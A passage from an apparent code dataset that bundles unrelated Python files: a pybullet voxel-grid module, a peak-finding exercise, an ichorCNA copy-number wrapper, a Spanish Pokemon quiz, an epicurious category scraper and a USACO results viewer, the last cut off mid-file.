result","repo_name":"Cristian-Barajas09/circunversa_project","sub_path":"model/modelo.py","file_name":"modelo.py","file_ext":"py","file_size_in_byte":5929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42647136568","text":"import os\nimport pybullet as p\nimport numpy as np\nimport time\nfrom itertools import product\n\nfrom .utils import unit_pose, safe_zip, multiply, Pose, AABB, create_box, set_pose, get_all_links, LockRenderer, \\\n get_aabb, pairwise_link_collision, remove_body, draw_aabb, get_box_geometry, create_shape, create_body, STATIC_MASS, \\\n unit_quat, unit_point, CLIENT, create_shape_array, set_color, get_point, clip, load_model, TEMP_DIR, NULL_ID, \\\n elapsed_time, draw_point, invert, tform_point, draw_pose, get_aabb_edges, add_line, \\\n get_pose, PoseSaver, get_aabb_vertices, aabb_from_points, apply_affine, OOBB, draw_oobb, get_aabb_center\n\nMAX_TEXTURE_WIDTH = 418 # max square dimension\nMAX_PIXEL_VALUE = 2**8 - 1\nMAX_LINKS = 125 # Max links seems to be 126\n\n################################################################################\n\n# TODO: different extensions\n\nclass VoxelGrid(object):\n # https://github.mit.edu/caelan/ROS/blob/master/sparse_voxel_grid.py\n # https://github.mit.edu/caelan/ROS/blob/master/base_navigation.py\n # https://github.mit.edu/caelan/ROS/blob/master/utils.py\n # https://github.mit.edu/caelan/ROS/blob/master/voxel_detection.py\n # TODO: can always display the grid in RVIZ after filtering\n # TODO: compute the maximum sized cuboid (rectangle) in a grid (matrix)\n\n def __init__(self, resolutions, default=bool, world_from_grid=unit_pose(), aabb=None, color=(1, 0, 0, 0.5),):\n #def __init__(self, sizes, centers, pose=unit_pose()):\n # TODO: defaultdict\n #assert len(sizes) == len(centers)\n assert callable(default)\n self.resolutions = resolutions\n self.default = default\n self.value_from_voxel = {}\n self.world_from_grid = world_from_grid\n self.aabb = aabb # TODO: apply\n self.color = color\n #self.bodies = None\n # TODO: store voxels more intelligently spatially\n @property\n def occupied(self): # TODO: get_occupied\n return sorted(self.value_from_voxel)\n def __iter__(self):\n return iter(self.value_from_voxel)\n def __len__(self):\n return len(self.value_from_voxel)\n def copy(self): # TODO: deepcopy\n new_grid = VoxelGrid(self.resolutions, self.default, self.world_from_grid, self.aabb, self.color)\n new_grid.value_from_voxel = dict(self.value_from_voxel)\n return new_grid\n\n def to_grid(self, point_world):\n return 
tform_point(invert(self.world_from_grid), point_world)\n def to_world(self, point_grid):\n return tform_point(self.world_from_grid, point_grid)\n\n def voxel_from_point(self, point):\n point_grid = self.to_grid(point)\n return tuple(np.floor(np.divide(point_grid, self.resolutions)).astype(int))\n #def voxels_from_aabb_grid(self, aabb):\n # voxel_lower, voxel_upper = map(self.voxel_from_point, aabb)\n # return map(tuple, product(*[range(l, u + 1) for l, u in safe_zip(voxel_lower, voxel_upper)]))\n def voxels_from_aabb(self, aabb):\n voxel_lower, voxel_upper = aabb_from_points([\n self.voxel_from_point(point) for point in get_aabb_vertices(aabb)])\n return map(tuple, product(*[range(l, u + 1) for l, u in safe_zip(voxel_lower, voxel_upper)]))\n\n # Grid coordinate frame\n def lower_from_voxel(self, voxel):\n return np.multiply(voxel, self.resolutions) # self.to_world(\n def center_from_voxel(self, voxel):\n return self.lower_from_voxel(np.array(voxel) + 0.5)\n def upper_from_voxel(self, voxel):\n return self.lower_from_voxel(np.array(voxel) + 1.0)\n def aabb_from_voxel(self, voxel):\n return AABB(self.lower_from_voxel(voxel), self.upper_from_voxel(voxel))\n\n def ray_trace(self, start_cell, goal_point):\n # TODO: finish adapting\n if self.is_occupied(start_cell):\n return [], False\n goal_cell = self.get_index(goal_point)\n start_point = self.get_center(start_cell)\n unit = goal_point - start_point\n unit /= np.linalg.norm(unit)\n direction = (unit / np.abs(unit)).astype(int)\n\n path = []\n current_point = start_point\n current_cell = start_cell\n while current_cell != goal_cell:\n path.append(current_cell)\n min_k, min_t = None, float('inf')\n for k, sign in enumerate(direction):\n next_point = self.get_min(current_cell) if sign < 0 else self.get_max(current_cell)\n t = ((next_point - current_point)/direction)[k]\n assert(t > 0)\n if (t != 0) and (t < min_t):\n min_k, min_t = k, t\n assert(min_k is not None)\n current_point += min_t*unit\n current_cell = np.array(current_cell, dtype=int)\n current_cell[min_k] += direction[min_k]\n current_cell = tuple(current_cell)\n if self.is_occupied(current_cell):\n return path, False\n return path, True\n\n # World coordinate frame\n def pose_from_voxel(self, voxel):\n pose_grid = Pose(self.center_from_voxel(voxel))\n return multiply(self.world_from_grid, pose_grid)\n def vertices_from_voxel(self, voxel):\n return list(map(self.to_world, get_aabb_vertices(self.aabb_from_voxel(voxel))))\n\n def contains(self, voxel): # TODO: operator versions\n return voxel in self.value_from_voxel\n def get_value(self, voxel):\n assert self.contains(voxel)\n return self.value_from_voxel[voxel]\n def set_value(self, voxel, value):\n # TODO: remove if value == default\n self.value_from_voxel[voxel] = value\n def remove_value(self, voxel):\n if self.contains(voxel):\n self.value_from_voxel.pop(voxel) # TODO: return instead?\n\n is_occupied = contains\n def set_occupied(self, voxel):\n if self.is_occupied(voxel):\n return False\n self.set_value(voxel, value=self.default())\n return True\n def set_free(self, voxel):\n if not self.is_occupied(voxel):\n return False\n self.remove_value(voxel)\n return True\n\n def get_neighbors(self, index):\n for i in range(len(index)):\n direction = np.zeros(len(index), dtype=int)\n for n in (-1, +1):\n direction[i] = n\n yield tuple(np.array(index) + direction)\n def get_clusters(self, voxels=None):\n if voxels is None:\n voxels = self.occupied\n clusters = []\n assigned = set()\n def dfs(current):\n if (current in assigned) or (not 
self.is_occupied(current)):\n return []\n cluster = [current]\n assigned.add(current)\n for neighbor in self.get_neighbors(current):\n cluster.extend(dfs(neighbor))\n return cluster\n\n for voxel in voxels:\n cluster = dfs(voxel)\n if cluster:\n clusters.append(cluster)\n return clusters\n\n # TODO: implicitly check collisions\n def create_box(self):\n color = (0, 0, 0, 0)\n #color = None\n box = create_box(*self.resolutions, color=color)\n #set_color(box, color=color)\n set_pose(box, self.world_from_grid) # Set to (0, 0, 0) instead?\n return box\n def get_affected(self, bodies, occupied):\n #assert self.world_from_grid == unit_pose()\n check_voxels = {}\n for body in bodies:\n # TODO: compute AABB in grid frame\n # pose_world = get_pose(body)\n # pose_grid = multiply(invert(self.world_from_grid), pose_world)\n # with PoseSaver(body):\n # set_pose(body, pose_grid)\n for link in get_all_links(body):\n aabb = get_aabb(body, link) # TODO: pad using threshold\n for voxel in self.voxels_from_aabb(aabb):\n if self.is_occupied(voxel) == occupied:\n check_voxels.setdefault(voxel, []).append((body, link))\n return check_voxels\n def check_collision(self, box, voxel, pairs, threshold=0.):\n box_pairs = [(box, link) for link in get_all_links(box)]\n set_pose(box, self.pose_from_voxel(voxel))\n return any(pairwise_link_collision(body1, link1, body2, link2, max_distance=threshold)\n for (body1, link1), (body2, link2) in product(pairs, box_pairs))\n\n def add_point(self, point):\n self.set_occupied(self.voxel_from_point(point))\n def add_aabb(self, aabb):\n for voxel in self.voxels_from_aabb(aabb):\n self.set_occupied(voxel)\n def add_body(self, body, **kwargs):\n self.add_bodies([body], **kwargs)\n def add_bodies(self, bodies, threshold=0.):\n # Otherwise, need to transform bodies\n check_voxels = self.get_affected(bodies, occupied=False)\n box = self.create_box()\n for voxel, pairs in check_voxels.items(): # pairs typically only has one element\n if self.check_collision(box, voxel, pairs, threshold=threshold):\n self.set_occupied(voxel)\n remove_body(box)\n def remove_body(self, body, **kwargs):\n self.remove_bodies([body], **kwargs)\n def remove_bodies(self, bodies, **kwargs):\n # TODO: could also just iterate over the voxels directly\n check_voxels = self.get_affected(bodies, occupied=True)\n box = self.create_box()\n for voxel, pairs in check_voxels.items():\n if self.check_collision(box, voxel, pairs, **kwargs):\n self.set_free(voxel)\n remove_body(box)\n\n def draw_origin(self, scale=1, **kwargs):\n size = scale*np.min(self.resolutions)\n return draw_pose(self.world_from_grid, length=size, **kwargs)\n def draw_voxel(self, voxel, color=None):\n if color is None:\n color = self.color\n aabb = self.aabb_from_voxel(voxel)\n return draw_oobb(OOBB(aabb, self.world_from_grid), color=color[:3])\n # handles.extend(draw_aabb(aabb, color=self.color[:3]))\n def draw_voxel_boxes(self, voxels=None, **kwargs):\n if voxels is None:\n voxels = self.occupied\n with LockRenderer():\n handles = []\n for voxel in voxels:\n handles.extend(self.draw_voxel(voxel, **kwargs))\n return handles\n def draw_voxel_centers(self, voxels=None, color=None):\n # TODO: could align with grid orientation\n if voxels is None:\n voxels = self.occupied\n if color is None:\n color = self.color\n with LockRenderer():\n size = np.min(self.resolutions) / 2\n handles = []\n for voxel in voxels:\n point_world = self.to_world(self.center_from_voxel(voxel))\n handles.extend(draw_point(point_world, size=size, color=color[:3]))\n return 
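handles\n\n    def draw_occupied_centers_in_aabb(self, aabb, color=None):\n        # (Added sketch: a hypothetical convenience wrapper, not part of the\n        # original class.) Draws only the occupied voxel centers that fall\n        # inside a world-frame AABB, reusing draw_voxel_centers above.\n        voxels = [v for v in self.voxels_from_aabb(aabb) if self.is_occupied(v)]\n        handles = self.draw_voxel_centers(voxels=voxels, color=color)\n        return 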
handles\n\n def create_voxel_bodies1(self):\n start_time = time.time()\n geometry = get_box_geometry(*self.resolutions)\n collision_id, visual_id = create_shape(geometry, color=self.color)\n bodies = []\n for voxel in self.occupied:\n body = create_body(collision_id, visual_id)\n #scale = self.resolutions[0]\n #body = load_model('models/voxel.urdf', fixed_base=True, scale=scale)\n set_pose(body, self.pose_from_voxel(voxel))\n bodies.append(body) # 0.0462474774444 / voxel\n print(elapsed_time(start_time))\n return bodies\n def create_voxel_bodies2(self):\n geometry = get_box_geometry(*self.resolutions)\n collision_id, visual_id = create_shape(geometry, color=self.color)\n ordered_voxels = self.occupied\n bodies = []\n for start in range(0, len(ordered_voxels), MAX_LINKS):\n voxels = ordered_voxels[start:start + MAX_LINKS]\n body = p.createMultiBody(#baseMass=STATIC_MASS,\n #baseCollisionShapeIndex=-1,\n #baseVisualShapeIndex=-1,\n #basePosition=unit_point(),\n #baseOrientation=unit_quat(),\n #baseInertialFramePosition=unit_point(),\n #baseInertialFrameOrientation=unit_quat(),\n linkMasses=len(voxels)*[STATIC_MASS],\n linkCollisionShapeIndices=len(voxels)*[collision_id],\n linkVisualShapeIndices=len(voxels)*[visual_id],\n linkPositions=list(map(self.center_from_voxel, voxels)),\n linkOrientations=len(voxels)*[unit_quat()],\n linkInertialFramePositions=len(voxels)*[unit_point()],\n linkInertialFrameOrientations=len(voxels)*[unit_quat()],\n linkParentIndices=len(voxels)*[0],\n linkJointTypes=len(voxels)*[p.JOINT_FIXED],\n linkJointAxis=len(voxels)*[unit_point()],\n physicsClientId=CLIENT)\n set_pose(body, self.world_from_grid)\n bodies.append(body) # 0.0163199263677 / voxel\n return bodies\n def create_voxel_bodies3(self):\n ordered_voxels = self.occupied\n geoms = [get_box_geometry(*self.resolutions) for _ in ordered_voxels]\n poses = list(map(self.pose_from_voxel, ordered_voxels))\n #colors = [list(self.color) for _ in self.voxels] # TODO: colors don't work\n colors = None\n collision_id, visual_id = create_shape_array(geoms, poses, colors)\n body = create_body(collision_id, visual_id) # Max seems to be 16\n #dump_body(body)\n set_color(body, self.color)\n return [body]\n def create_voxel_bodies(self):\n with LockRenderer():\n return self.create_voxel_bodies1()\n #return self.create_voxel_bodies2()\n #return self.create_voxel_bodies3()\n\n def create_intervals(self):\n voxel_heights = {}\n for i, j, k in self.occupied:\n voxel_heights.setdefault((i, j), set()).add(k)\n voxel_intervals = []\n for i, j in voxel_heights:\n heights = sorted(voxel_heights[i, j])\n start = last = heights[0]\n for k in heights[1:]:\n if k == last + 1:\n last = k\n else:\n interval = (start, last)\n voxel_intervals.append((i, j, interval))\n start = last = k\n interval = (start, last)\n voxel_intervals.append((i, j, interval))\n return voxel_intervals\n def draw_intervals(self):\n with LockRenderer():\n handles = []\n for (i, j, (k1, k2)) in self.create_intervals():\n voxels = [(i, j, k1), (i, j, k2)]\n aabb = aabb_from_points([extrema for voxel in voxels for extrema in self.aabb_from_voxel(voxel)])\n handles.extend(draw_oobb(OOBB(aabb, self.world_from_grid), color=self.color[:3]))\n return handles\n def draw_vertical_lines(self):\n with LockRenderer():\n handles = []\n for (i, j, (k1, k2)) in self.create_intervals():\n voxels = [(i, j, k1), (i, j, k2)]\n aabb = aabb_from_points([extrema for voxel in voxels for extrema in self.aabb_from_voxel(voxel)])\n center = get_aabb_center(aabb)\n p1 = 
self.to_world(np.append(center[:2], [aabb[0][2]]))\n p2 = self.to_world(np.append(center[:2], [aabb[1][2]]))\n handles.append(add_line(p1, p2, color=self.color[:3]))\n return handles\n\n def project2d(self):\n # TODO: combine adjacent voxels into larger lines\n # TODO: greedy algorithm that combines lines/boxes\n # TODO: combine intervals\n tallest_voxel = {}\n for i, j, k in self.occupied:\n tallest_voxel[i, j] = max(k, tallest_voxel.get((i, j), k))\n return {(i, j, k) for (i, j), k in tallest_voxel.items()}\n def create_height_map(self, plane, plane_size, width=MAX_TEXTURE_WIDTH, height=MAX_TEXTURE_WIDTH):\n min_z, max_z = 0., 2.\n plane_extent = plane_size*np.array([1, 1, 0])\n plane_lower = get_point(plane) - plane_extent/2.\n #plane_aabb = (plane_lower, plane_lower + plane_extent)\n #plane_aabb = get_aabb(plane) # TODO: bounding box is effectively empty\n #plane_lower, plane_upper = plane_aabb\n #plane_extent = (plane_upper - plane_lower)\n image_size = np.array([width, height])\n # TODO: fix width/height order\n pixel_from_point = lambda point: np.floor(\n image_size * (point - plane_lower)[:2] / plane_extent[:2]).astype(int)\n\n # TODO: last row/col doesn't seem to be filled\n height_map = np.zeros(image_size)\n for voxel in self.project2d():\n voxel_aabb = self.aabb_from_voxel(voxel)\n #if not aabb_contains_aabb(aabb2d_from_aabb(voxel_aabb), aabb2d_from_aabb(plane_aabb)):\n # continue\n (x1, y1), (x2, y2) = map(pixel_from_point, voxel_aabb)\n if (x1 < 0) or (width <= x2) or (y1 < 0) or (height <= y2):\n continue\n scaled_z = (clip(voxel_aabb[1][2], min_z, max_z) - min_z) / max_z\n for c in range(x1, x2+1):\n for y in range(y1, y2+1):\n r = height - y - 1 # TODO: can also just set in bulk if using height_map\n height_map[r, c] = max(height_map[r, c], scaled_z)\n return height_map\n\n################################################################################\n\ndef create_textured_square(size, color=None,\n width=MAX_TEXTURE_WIDTH, height=MAX_TEXTURE_WIDTH):\n body = load_model('models/square.urdf', scale=size)\n if color is not None:\n set_color(body, color)\n path = os.path.join(TEMP_DIR, 'texture.png')\n image = MAX_PIXEL_VALUE*np.ones((width, height, 3), dtype=np.uint8)\n import scipy.misc\n scipy.misc.imsave(path, image)\n texture = p.loadTexture(path)\n p.changeVisualShape(body, NULL_ID, textureUniqueId=texture, physicsClientId=CLIENT)\n return body, texture\n\n\ndef set_texture(texture, image):\n # Alias/WaveFront Material (.mtl) File Format\n # https://people.cs.clemson.edu/~dhouse/courses/405/docs/brief-mtl-file-format.html\n #print(get_visual_data(body))\n width, height, channels = image.shape\n pixels = image.flatten().tolist()\n assert len(pixels) <= 524288\n # b3Printf: uploadBulletFileToSharedMemory 747003 exceeds max size 524288\n p.changeTexture(texture, pixels, width, height, physicsClientId=CLIENT)\n # TODO: it's important that width and height are the same as the original\n\n\ndef rgb_interpolate(grey_image, min_color, max_color):\n width, height = grey_image.shape\n channels = 3\n rgb_image = np.zeros((width, height, channels), dtype=np.uint8)\n for k in range(channels):\n rgb_image[..., k] = MAX_PIXEL_VALUE*(min_color[k]*(1-grey_image) + max_color[k]*grey_image)\n return rgb_image","repo_name":"caelan/pybullet-planning","sub_path":"pybullet_tools/voxels.py","file_name":"voxels.py","file_ext":"py","file_size_in_byte":19254,"program_lang":"python","lang":"en","doc_type":"code","stars":347,"dataset":"github-code","pt":"21"} +{"seq_id":"35675144036","text":"# 
-*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Oct 22 21:13:58 2018\r\n\r\n@author: Atul Anand\r\n\"\"\"\r\n\r\n\r\n\r\ndef findPeakElementBest(list1,low,high):  # O(log n) divide-and-conquer peak finder\r\n    mid = (low + high ) //2   #low + ( (high - low) //2)\r\n    n = len(list1)\r\n    if ( (( mid ==0) or (list1[mid-1] <= list1[mid] ) ) and (( mid == n-1) or (list1[mid+1] <= list1[mid] ))):\r\n        return mid\r\n    \r\n    elif ( mid > 0 and ( list1[mid-1] > list1[mid]) ):\r\n        return findPeakElementBest(list1,low,mid-1)\r\n    \r\n    else:\r\n        return findPeakElementBest(list1,mid+1,high)\r\n    \r\n    \r\n    \r\n    \r\n\r\n\r\nlist1=[10,20,15,2,23,90,67]\r\n\r\nprint(findPeakElementBest(list1,0,len(list1)-1))\r\n\r\n\r\n\r\n\r\ndef findPeakElement(list1):\r\n    left=list1[0]\r\n    right= list1[2]\r\n    peakElemList =[]\r\n    for i in range(1,len(list1)):\r\n        if left < list1[i] and list1[i] >right:\r\n            peakElemList.append(list1[i])\r\n        left = list1[i]\r\n        try:\r\n            right = list1[i+2]\r\n        except:\r\n            continue\r\n    return max(peakElemList)\r\n\r\n\r\nlist1=[10,20,15,2,23,90,67]\r\n\r\nprint(findPeakElement(list1))\r\n    ","repo_name":"atulanandnitt/questionsBank","sub_path":"basicDataStructure/array_list/extra/findPeakElement.py","file_name":"findPeakElement.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"4655360614","text":"#Email:fanyucai1@126.com\n#2019.3.23\n\nimport os\nimport argparse\nimport subprocess\nR=\"/software/R/R-v3.5.2/bin/\"\nHMMcopy=\"/software/hmmcopy_utils/hmmcopy_utils-master/bin/\"\nichorCNA=\"/software/ichorCNA/ichorCNA-master\"\n\nparser=argparse.ArgumentParser(\"Use ichorCNA to evaluate the prognostic role of cfDNA tumor fraction\")\nparser.add_argument(\"--bam\",help=\"bam files\",required=True)\nparser.add_argument(\"--bin\",type=int,help=\"bin size(kb)\",required=True,choices=[10,50,500,1000])\nparser.add_argument(\"--prefix\",help=\"prefix of output\",required=True)\nparser.add_argument(\"--outdir\",help=\"output directory\",required=True)\nargs=parser.parse_args()\nbin=args.bin*1000\nif not os.path.exists(args.outdir):\n    os.mkdir(args.outdir)\nout=os.path.join(args.outdir,args.prefix)\nargs.bam=os.path.abspath(args.bam)\n######################Generate Read Count File\ncmd=\"%s/readCounter --window %s --quality 20 --chromosome \\\"1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,X,Y\\\" %s >%s.wig\" \\\n    %(HMMcopy,bin,args.bam,out)\nsubprocess.check_call(cmd,shell=True)\n#######################run ichorCNA\npar=\"--gcWig %s/inst/extdata/gc_hg19_%skb.wig \" %(ichorCNA,args.bin)\npar+=\"--mapWig %s/inst/extdata/map_hg19_%skb.wig \" %(ichorCNA,args.bin)\npar+=\"--centromere %s/inst/extdata/GRCh37.p13_centromere_UCSC-gapTable.txt \"%(ichorCNA)\n####################Low tumor content samples (early stage disease)https://github.com/broadinstitute/ichorCNA/wiki/Parameter-tuning-and-settings#low-tumor-content-samples-early-stage-disease\npar+=\"--ploidy \\\"c(2)\\\" \"\npar+=\"--normal \\\"c(0.95, 0.99, 0.995, 0.999)\\\" \"\npar+=\"--chrs \\\"c(1:22)\\\" --chrTrain \\\"c(1:22)\\\" \"\npar+=\"--estimateScPrevalence FALSE --scStates \\\"c()\\\" \"\npar+=\"--maxCN 4 \"\nif args.bin==1000:\n    par+=\"--normalPanel %s/inst/extdata/HD_ULP_PoN_1Mb_median_normAutosome_mapScoreFiltered_median.rds\"%(ichorCNA)\nif args.bin==500:\n    par+=\"--normalPanel %s/inst/extdata/HD_ULP_PoN_500kb_median_normAutosome_mapScoreFiltered_median.rds\"%(ichorCNA)\ncmd=\"%s/Rscript %s/scripts/runIchorCNA.R --id %s --WIG %s.wig %s --outDir %s\" \\\n    
%(R,ichorCNA,args.prefix,out,par,args.outdir)\nsubprocess.check_call(cmd,shell=True)","repo_name":"fanyucai1/script","sub_path":"ichorCNA.py","file_name":"ichorCNA.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} {"seq_id":"72577554987","text":"'''----------EXAM CHALLENGE-----\nBuild an exam with 3 questions of\nyour choice; the user must answer\nYES or NO and at the end gets a grade\n(the grade is kept in a variable that\nstarts at 0 and is incremented by 1\nfor each correct answer)\n\n'''\n# the initial grade is 0\ncalificación = 0\n\n\n'''\n\npregunta_1 = input('Does the starter evolve at level 17? : \\r\\n')\nif pregunta_1 == 'YES':\n    print('Incorrect. They evolve at level 16')\n\n\nelif pregunta_1 == 'NO':\n    print('Correct')\n    calificación += 1\n\nprint(f'You have {calificación} of 3')\n\npregunta_2 = input('Can the user carry 7 Pokemon on their team at once? \\r\\n')\n\nif pregunta_2 == 'YES':\n    print('Incorrect. A team holds at most 6 Pokemon')\n\nelif pregunta_2 == 'NO':\n    print('Correct')\n    calificación += 1\n\nprint(f'You have {calificación} of 3')\n\npregunta_3 = input('Is the Elite Four made up of 4 trainers plus the champion? \\r\\n')\n\nif pregunta_3 == 'NO':\n    print('Incorrect. It is indeed 4 trainers plus the champion')\n\nelif pregunta_3 == 'YES':\n    print('Correct')\n    calificación += 1\n    print(f'You have {calificación} of 3')\n\nprint(f'Your final grade was {calificación} of 3')\n\n'''\ncalificación = 0\n\npreguntas = {'Does the starter evolve at level 17? :': 'no',\n             'Can the user carry 7 Pokemon on their team at once?': 'no',\n             'Is the Elite Four made up of 4 trainers plus the champion?': 'yes'}\n\nfor pregunta in preguntas:\n    question = input(pregunta)\n    if question == preguntas.get(pregunta):\n        calificación +=1\n\nprint(f'Your grade is {calificación} of 3')\n","repo_name":"macRountree/Desarrolloweb","sub_path":"Python/14 inputRetoexamen.py","file_name":"14 inputRetoexamen.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"38650698233","text":"import scrapy\n\n# scrapy runspider scrapping_category_types.py -o categories_by_type_from_top_100_recipes.json\n\ndef clean_string(x):\n    x = x.strip().replace(\" \",\"-\").replace(\"/\",\"-\").replace(\"&\",\"and\").replace(\"'\",\"\")\n    x = x.replace(\"é\",\"e\").replace(\"ñ\",\"n\").lower()\n    # one of the \"type\" categories has its URL in the singular\n    x = x.replace(\"cookies\",\"cookie\")\n    return x\n    \nclass CategoriesSpider(scrapy.Spider):\n    name = \"categoriesspider\"\n    categories = []\n    with open(\"categories_from_top_100_recipes.txt\", \"r\") as file:\n        categories_raw = file.readlines()\n    \n    categories = [clean_string(cat) for cat in categories_raw]\n    \n    ingredients = [\"https://www.epicurious.com/ingredients/\"+ cat.lower() for cat in categories]\n    source = [\"https://www.epicurious.com/source/\"+ cat.lower() for cat in categories]\n    special_considerations = [\"https://www.epicurious.com/special-consideration/\"+ cat.lower() for cat in categories]\n    type_urls = [\"https://www.epicurious.com/type/\"+ cat.lower() for cat in categories]\n    tag = [\"https://www.epicurious.com/tag/\"+ cat.lower() for cat in categories]\n    meal = [\"https://www.epicurious.com/meal/\"+ cat.lower() for cat in categories]\n    occasion = [\"https://www.epicurious.com/occasion/\"+ cat.lower() for cat in categories]\n    technique = 
[\"https://www.epicurious.com/technique/\"+ cat.lower() for cat in categories]\n    cusine = [\"https://www.epicurious.com/cusine/\"+ cat.lower() for cat in categories]\n    ingredient = [\"https://www.epicurious.com/ingredient/\"+ cat.lower() for cat in categories]\n    equipment = [\"https://www.epicurious.com/equipment/\"+ cat.lower() for cat in categories]\n    location = [\"https://www.epicurious.com/location/\"+ cat.lower() for cat in categories]\n    \n    start_urls = ingredients+source+special_considerations+type_urls+tag+meal+occasion+technique+cusine+ingredient+equipment+location\n\n    def parse(self, response):\n        url = response.request.url\n        cat_type = url.split(\".com/\")[-1].split(\"/\")[0]\n        category = url.split(\"/\")[-1].split(\"?\")[0]\n\n        # if the recipes list tag is found then the category page is valid\n        if len(response.css(\".list_content\")) != 0:\n            yield {\"type\":cat_type,\"url\":url,\"category\":category}\n","repo_name":"Ftspublicidade/Oncase-Receitas","sub_path":"scrapping_category_types.py","file_name":"scrapping_category_types.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} {"seq_id":"28602781741","text":"import re, os, sys, json, getch\n\ndef compileUSACO():\n    results = open(\"results.out\", \"r\")\n    for i in range(8):\n        _ = results.readline()\n\n    def normalize(s):\n        s = s.replace(\" \", \"\\t\")\n        return re.sub(r'\\t+', '\\t', s)\n\n    c1, c2, c3 = normalize(results.readline()).split()[-3:]\n\n    compiled = {'intl': []}\n\n    s = results.readline()\n    while s[:11] != \"Pre-College\":\n        s = normalize(s).split()\n        country = s[0]\n        year = s[1]\n        name = s[2] + \" \" + s[3]\n        score = s[4]\n        c1s = \"\".join(s[5:15])\n        c2s = \"\".join(s[15:25])\n        c3s = \"\".join(s[25:35])\n        result = {\"name\": name, \"year\": year, \"country\": country, \"score\": {\"total\": score, c1: c1s, c2: c2s, c3: c3s}}\n        compiled['intl'].append(result)\n        s = results.readline()\n\n    with open(\"compiledResults.out\", \"w+\") as f:\n        f.write(json.dumps(compiled, indent=4))\n\ndef optionChooser(again=False):\n    try:\n        if not again:\n            print(\"USACO Results:\\n\\n(q) Quit\\n(0) Compile Results\\n(1) Get All Results\\n(2) Search\")\n        chooser = getch.getch().lower()\n        if chooser == '\\x7f':\n            chooser = optionChooser(True)\n        if chooser not in [\"q\", \"0\", \"1\", \"2\"]:\n            print(\"Invalid Option, please try again.\")\n            chooser = optionChooser(True)\n        return chooser\n    except ValueError:\n        print(\"Invalid Option, please try again.\")\n        chooser = optionChooser(True)\n        return chooser  # propagate the re-chosen option instead of returning None\n\ndef optionChooser2(again=False):\n    try:\n        if not again:\n            print(\"Search by?\\n\\n(b) Back\\n(n) Name\\n(s) Score\\n(c) Country\")\n        chooser = getch.getch().lower()\n        if chooser == '\\x7f':\n            chooser = optionChooser2(True)\n        if chooser not in [\"b\", \"n\", \"s\", \"c\"]:\n            print(\"Invalid Option, please try again.\")\n            chooser = optionChooser2(True)\n        return chooser\n    except ValueError:\n        print(\"Invalid Option, please try again.\")\n        chooser = optionChooser2(True)\n        return chooser  # propagate the re-chosen option instead of returning None\n\ndef main(chooser=None, option=None):\n    if not chooser:\n        os.system(\"clear\")\n        chooser = optionChooser()\n    os.system(\"clear\")\n    if chooser == \"q\":\n        sys.exit(0)\n    elif chooser == \"0\":\n        compileUSACO()\n    elif chooser == \"1\":\n        try:\n            with open(\"compiledResults.out\", \"r\") as f:\n                print(f.read())\n            chooser = getch.getch()\n            os.system(\"clear\")\n        except:\n            compileUSACO()\n            with open(\"compiledResults.out\", \"r\") as f:\n                print(f.read())\n            chooser = getch.getch()\n            os.system(\"clear\")\n        
main()\n    elif chooser == \"2\":\n        if not option:\n            option = optionChooser2()\n        results = json.loads(open(\"compiledResults.out\").read())\n        if option == \"b\":\n            main()\n        elif option == \"n\":\n            s = \"\"\n            ch = \"\"\n            os.system(\"clear\")\n            print(\"Name: \", end=\"\", flush=True)\n            while ch != '\\n':\n                ch = getch.getch()\n                if ch == \"\\x7f\":\n                    s = s[:-1]\n                if ch.isalpha() or ch == \" \":\n                    s += ch\n                os.system('clear')\n                print(\"Name: \" + s, end=\"\", flush=True)\n            search = [result for result in results['intl'] if s.lower() == result[\"name\"].lower()]\n            if len(search) == 0: search = [result for result in results['intl'] if s.lower() in result[\"name\"].lower()]\n            os.system('clear')\n            if len(search) == 0:\n                print(\"Nothing was found. Go (h)ome.\")\n                getch.getch()\n                main()\n            if len(search) == 1:\n                score = search[0][\"score\"]\n                total = search[0][\"score\"][\"total\"]\n                score.pop(\"total\")\n                print(\"Name: \"+search[0][\"name\"] + \"\\nYear: \" + search[0][\"year\"] + \"\\nCountry: \" + search[0][\"country\"] + \"\\nScore: \" + total)\n                for key in score:\n                    print(\"    \" + key + \": \" + score[key])\n                getch.getch()\n                main()\n            else:\n                print(\"There were multiple results. Which one?\\n\")\n                for result in search:\n                    print(\"(\" + str(search.index(result) + 1) + \") \" + result[\"name\"] + \"(\" + result[\"year\"] + \") from \" + result[\"country\"])\n                try:\n                    getchr = int(getch.getch())\n                    if 1 <= int(getchr) <= len(search):\n                        i = int(getchr) - 1\n                        score = search[i][\"score\"]\n                        total = search[i][\"score\"][\"total\"]\n                        score.pop(\"total\")\n                        os.system(\"clear\")\n                        print(\"Name: \"+search[i][\"name\"] + \"\\nYear: \" + search[i][\"year\"] + \"\\nCountry: \" + search[i][\"country\"] + \"\\nScore: \" + total)\n                        for key in score:\n                            print(\"    \" + key + \": \" + score[key])\n                        getch.getch()\n                        main()\n                except:\n                    pass\n                main(\"2\", \"n\")\n        elif option == \"s\":\n            s = \"\"\n            ch = \"\"\n            os.system(\"clear\")\n            print(\"Score: \", end=\"\", flush=True)\n            while ch != '\\n':\n                ch = getch.getch()\n                if ch == \"\\x7f\":\n                    s = s[:-1]\n                if ch.isnumeric() or ch == \" \":\n                    s += ch\n                os.system('clear')\n                print(\"Score: \" + s, end=\"\", flush=True)\n            search = [result for result in results['intl'] if s == result[\"score\"][\"total\"]]\n            os.system('clear')\n            print(str(len(search)) + \" people got this score:\\n\")\n            for result in search:\n                print(\"(\" + str(search.index(result) + 1) + \") \" + result[\"name\"] + \"(\" + result[\"year\"] + \") from \" + result[\"country\"])\n            try:\n                getchr = \"\"\n                while \"\\n\" not in getchr:\n                    ch = str(getch.getch())\n                    if ch == \"q\":\n                        getchr = \"\"\n                        break\n                    getchr += ch  # append the key that was just read (a second keypress was being consumed here)\n                getchr = getchr.replace(\"\\n\", \"\")  # str.replace returns a new string, so the result must be 